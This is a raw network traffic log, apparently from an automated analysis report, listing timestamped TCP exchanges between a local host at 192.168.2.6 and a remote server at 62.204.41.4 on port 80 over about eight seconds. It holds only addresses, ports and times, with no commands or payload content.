Feb 7, 2023 20:02:58.670959949 CET	50162	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.671823978 CET	50163	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.731852055 CET	80	50162	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.732028008 CET	50162	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.734479904 CET	80	50163	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.734616995 CET	50163	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.736660957 CET	50163	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.799388885 CET	80	50163	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.802519083 CET	80	50163	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.802664995 CET	50163	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.920202971 CET	50163	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.923142910 CET	50164	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.983089924 CET	80	50163	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.983258963 CET	50163	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.984085083 CET	80	50164	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.984888077 CET	50164	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.984888077 CET	50164	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.046638012 CET	80	50164	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.050481081 CET	80	50164	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.050657034 CET	50164	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.168243885 CET	50164	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.169023037 CET	50165	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.231599092 CET	80	50164	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.231750965 CET	50164	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.232784033 CET	80	50165	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.233381987 CET	50165	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.233845949 CET	50165	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.295523882 CET	80	50165	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.298787117 CET	80	50165	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.298873901 CET	50165	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.405497074 CET	50165	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.406287909 CET	50166	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.467511892 CET	80	50166	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.468286991 CET	80	50165	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.468552113 CET	50165	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.470453978 CET	50166	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.478158951 CET	50166	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.538414955 CET	80	50166	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.541083097 CET	80	50166	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.541277885 CET	50166	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.653224945 CET	50166	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.654114962 CET	50167	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.713572025 CET	80	50166	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.714256048 CET	50166	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.714682102 CET	80	50167	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.714839935 CET	50167	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.715668917 CET	50167	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.776233912 CET	80	50167	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.780316114 CET	80	50167	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.781012058 CET	50167	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.888192892 CET	50167	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.889338017 CET	50168	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.949079037 CET	80	50167	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.949757099 CET	50167	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.951905966 CET	80	50168	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:59.952742100 CET	50168	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:59.953138113 CET	50168	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.016402960 CET	80	50168	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.018917084 CET	80	50168	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.021369934 CET	50168	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.137029886 CET	50168	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.137938023 CET	50169	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.199734926 CET	80	50168	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.199830055 CET	80	50169	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.199984074 CET	50168	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.200197935 CET	50169	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.200664997 CET	50169	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.262171984 CET	80	50169	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.265571117 CET	80	50169	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.265811920 CET	50169	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.371390104 CET	50169	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.372217894 CET	50170	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.431685925 CET	80	50170	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.431952953 CET	50170	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.433370113 CET	80	50169	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.433374882 CET	50170	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.433516026 CET	50169	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.492687941 CET	80	50170	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.494765043 CET	80	50170	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.495074987 CET	50170	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.606518984 CET	50170	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.607750893 CET	50171	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.667592049 CET	80	50170	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.667737961 CET	50170	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.670542955 CET	80	50171	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.670744896 CET	50171	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.685944080 CET	50171	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.747235060 CET	80	50171	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.749867916 CET	80	50171	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.749964952 CET	50171	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.860202074 CET	50172	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.861685038 CET	50171	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.920701981 CET	80	50172	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.920905113 CET	50172	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.921461105 CET	50172	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.924335957 CET	80	50171	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.925479889 CET	50171	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:00.982928991 CET	80	50172	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.986504078 CET	80	50172	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:00.986592054 CET	50172	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.090564966 CET	50172	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.092873096 CET	50173	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.151159048 CET	80	50172	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.151403904 CET	50172	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.154570103 CET	80	50173	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.154815912 CET	50173	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.155358076 CET	50173	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.216592073 CET	80	50173	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.220072985 CET	80	50173	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.220277071 CET	50173	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.347496986 CET	50173	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.348814011 CET	50174	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.408858061 CET	80	50173	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.409086943 CET	80	50174	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.409100056 CET	50173	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.409425020 CET	50174	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.410758972 CET	50174	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.471216917 CET	80	50174	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.474220991 CET	80	50174	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.474591970 CET	50174	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.592238903 CET	50175	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.594662905 CET	50174	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.653049946 CET	80	50175	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.653232098 CET	50175	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.654982090 CET	80	50174	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.656032085 CET	50174	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.662458897 CET	50175	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.724780083 CET	80	50175	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.726902008 CET	80	50175	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.727015018 CET	50175	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.845309973 CET	50175	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.846138954 CET	50176	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.906229973 CET	80	50175	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.906416893 CET	50175	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.908211946 CET	80	50176	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.908330917 CET	50176	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.908838034 CET	50176	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:01.971107006 CET	80	50176	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.974292994 CET	80	50176	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:01.974396944 CET	50176	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.096676111 CET	50176	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.097387075 CET	50177	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.161751986 CET	80	50177	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.162044048 CET	50177	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.162384987 CET	80	50176	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.162503958 CET	50176	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.166311026 CET	50177	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.227816105 CET	80	50177	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.231512070 CET	80	50177	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.231678963 CET	50177	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.339818001 CET	50177	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.340759039 CET	50178	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.400065899 CET	80	50178	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.400198936 CET	50178	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.400607109 CET	50178	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.401417971 CET	80	50177	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.401563883 CET	50177	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.459775925 CET	80	50178	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.463025093 CET	80	50178	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.463186979 CET	50178	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.575812101 CET	50178	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.576808929 CET	50179	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.635293961 CET	80	50178	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.635536909 CET	50178	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.638233900 CET	80	50179	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.638370991 CET	50179	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.638946056 CET	50179	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.700210094 CET	80	50179	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.702853918 CET	80	50179	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.702985048 CET	50179	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.808841944 CET	50179	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.809510946 CET	50180	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.870665073 CET	80	50179	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.870881081 CET	50179	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.870965958 CET	80	50180	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.871129036 CET	50180	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.871685982 CET	50180	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:02.934752941 CET	80	50180	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.937747002 CET	80	50180	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:02.937849045 CET	50180	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.075793982 CET	50180	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.076895952 CET	50182	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.136383057 CET	80	50182	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.136567116 CET	50182	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.137140036 CET	80	50180	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.137172937 CET	50182	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.137248039 CET	50180	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.196531057 CET	80	50182	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.200685024 CET	80	50182	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.200874090 CET	50182	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.309448004 CET	50182	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.312230110 CET	50183	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.369226933 CET	80	50182	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.369539976 CET	50182	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.373878002 CET	80	50183	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.374149084 CET	50183	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.375286102 CET	50183	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.436829090 CET	80	50183	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.439560890 CET	80	50183	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.439795971 CET	50183	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.543530941 CET	50183	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.545113087 CET	50184	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.605237007 CET	80	50183	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.605427027 CET	80	50184	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.605555058 CET	50183	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.606195927 CET	50184	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.616189957 CET	50184	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.678570986 CET	80	50184	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.680015087 CET	80	50184	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.683300018 CET	50184	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.793230057 CET	50184	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.794128895 CET	50185	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.853777885 CET	80	50184	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.854510069 CET	80	50185	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.854753017 CET	50184	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.854794979 CET	50185	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.865291119 CET	50185	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:03.925787926 CET	80	50185	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.927962065 CET	80	50185	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:03.930979013 CET	50185	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.044531107 CET	50185	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.045394897 CET	50186	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.105473995 CET	80	50185	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.106585026 CET	80	50186	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.106770039 CET	50185	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.106791973 CET	50186	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.107235909 CET	50186	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.168499947 CET	80	50186	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.172255039 CET	80	50186	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.172326088 CET	50186	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.278351068 CET	50186	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.279221058 CET	50187	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.339767933 CET	80	50186	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.339806080 CET	80	50187	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.340004921 CET	50186	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.340032101 CET	50187	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.340648890 CET	50187	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.401464939 CET	80	50187	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.403584957 CET	80	50187	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.403785944 CET	50187	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.527862072 CET	50187	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.528753042 CET	50188	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.588489056 CET	80	50187	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.588713884 CET	50187	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.590168953 CET	80	50188	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.590317965 CET	50188	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.590702057 CET	50188	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.651911020 CET	80	50188	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.655025959 CET	80	50188	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.655325890 CET	50188	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.765811920 CET	50188	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.768548012 CET	50189	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.827392101 CET	80	50188	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.827631950 CET	50188	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.831051111 CET	80	50189	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.831450939 CET	50189	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.831774950 CET	50189	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:04.894238949 CET	80	50189	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.896188974 CET	80	50189	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:04.896327972 CET	50189	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.018742085 CET	50189	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.018827915 CET	50190	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.082053900 CET	80	50190	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.082089901 CET	80	50189	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.082221031 CET	50190	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.082353115 CET	50189	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.082669020 CET	50190	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.145092010 CET	80	50190	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.148695946 CET	80	50190	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.148828030 CET	50190	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.264796972 CET	50190	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.265619993 CET	50191	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.326922894 CET	80	50191	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.327030897 CET	50191	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.327162027 CET	80	50190	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.327234983 CET	50190	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.327790976 CET	50191	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.389182091 CET	80	50191	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.391647100 CET	80	50191	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.391819000 CET	50191	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.500425100 CET	50191	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.503889084 CET	50192	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.562381029 CET	80	50191	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.562551975 CET	50191	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.564357996 CET	80	50192	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.564505100 CET	50192	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.567548990 CET	50192	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.629244089 CET	80	50192	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.630932093 CET	80	50192	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.631066084 CET	50192	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.754300117 CET	50192	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.755670071 CET	50193	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.815519094 CET	80	50192	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.815677881 CET	50192	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.819056988 CET	80	50193	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.819447041 CET	50193	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.833350897 CET	50193	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:05.895807028 CET	80	50193	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.898107052 CET	80	50193	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:05.898420095 CET	50193	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.014486074 CET	50194	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.014672995 CET	50193	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.074928999 CET	80	50194	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.075058937 CET	50194	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.078732967 CET	50194	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.078759909 CET	80	50193	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.079025984 CET	50193	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.138273001 CET	80	50194	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.141968012 CET	80	50194	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.142098904 CET	50194	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.253983974 CET	50194	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.254815102 CET	50195	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.314347029 CET	80	50194	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.315155029 CET	50194	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.316323042 CET	80	50195	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.319168091 CET	50195	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.319605112 CET	50195	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.383065939 CET	80	50195	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.383594036 CET	80	50195	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.383728981 CET	50195	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.499188900 CET	50195	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.500272989 CET	50196	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.560780048 CET	80	50195	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.561811924 CET	80	50196	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.562058926 CET	50195	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.562069893 CET	50196	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.562601089 CET	50196	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.624198914 CET	80	50196	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.626566887 CET	80	50196	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.627670050 CET	50196	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.777487993 CET	50196	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.778261900 CET	50197	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.839121103 CET	80	50196	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.839409113 CET	50196	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.839582920 CET	80	50197	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.839693069 CET	50197	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.840701103 CET	50197	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:06.902420998 CET	80	50197	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.904644966 CET	80	50197	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:06.905247927 CET	50197	80	192.168.2.6	62.204.41.4
